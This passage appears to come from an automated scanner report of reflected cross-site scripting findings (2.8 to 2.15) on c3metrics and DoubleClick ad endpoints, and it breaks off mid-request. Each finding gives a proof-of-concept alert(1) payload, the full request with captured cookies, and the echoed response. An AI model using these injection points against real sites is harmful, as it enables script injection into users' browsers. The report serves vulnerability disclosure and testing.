GET /v.js?id=adver&cid=480a06dd<script>alert(1)</script>49f90eb1dd2&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:43 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s14; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480a06dd<script>alert(1)</script>49f90eb1dd2&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...

2.8. http://480-adver-view.c3metrics.com/v.js [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload e1bdb<script>alert(1)</script>2e525f817b was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=advere1bdb<script>alert(1)</script>2e525f817b&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:42 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1048
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s8; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=advere1bdb<script>alert(1)</script>2e525f817b&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...

2.9. http://480-adver-view.c3metrics.com/v.js [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload d16cc<script>alert(1)</script>85e60d966a9 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=72d16cc<script>alert(1)</script>85e60d966a9 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:33:43 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s11; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=72d16cc<script>alert(1)</script>85e60d966a9&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...

2.10. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce280"-alert(1)-"57eeb56e770 was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2ce280"-alert(1)-"57eeb56e770&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:30:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
q%3B240571327%3B0-0%3B0%3B62874418%3B4307-300/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2ce280"-alert(1)-"57eeb56e770&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.0
...[SNIP]...

2.11. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a895"-alert(1)-"c9be2eb186c was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=2075956a895"-alert(1)-"c9be2eb186c&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:31:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
00/250%3B40422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=2075956a895"-alert(1)-"c9be2eb186c&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/c
...[SNIP]...

2.12. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [count parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec34a"-alert(1)-"28d6349bcd5 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=ec34a"-alert(1)-"28d6349bcd5&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
log/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=ec34a"-alert(1)-"28d6349bcd5&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-96463%7
...[SNIP]...

2.13. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [cpnmodule parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c739"-alert(1)-"9f1133c0075 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=1c739"-alert(1)-"9f1133c0075&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:33:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=1c739"-alert(1)-"9f1133c0075&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/solutions/network-optimization/?cm_mmc=OnlineAds_Q22011%7CCDW%7CMedlar-_-CNET%2FZDNET-_-
...[SNIP]...

2.14. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcb27"-alert(1)-"f2620025354 was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=bcb27"-alert(1)-"f2620025354&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Thu, 12 May 2011 13:32:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7210

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Jan 25 16:39:33
...[SNIP]...
0422013/40439800/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs513717%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=bcb27"-alert(1)-"f2620025354&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/http://www.cdw.com/content/sol
...[SNIP]...

2.15. http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5 [epartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1260.cnetzdnet/B5448313.5

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 835f0"-alert(1)-"b57ef62ecd6 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=835f0"-alert(1)-"b57ef62ecd6&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
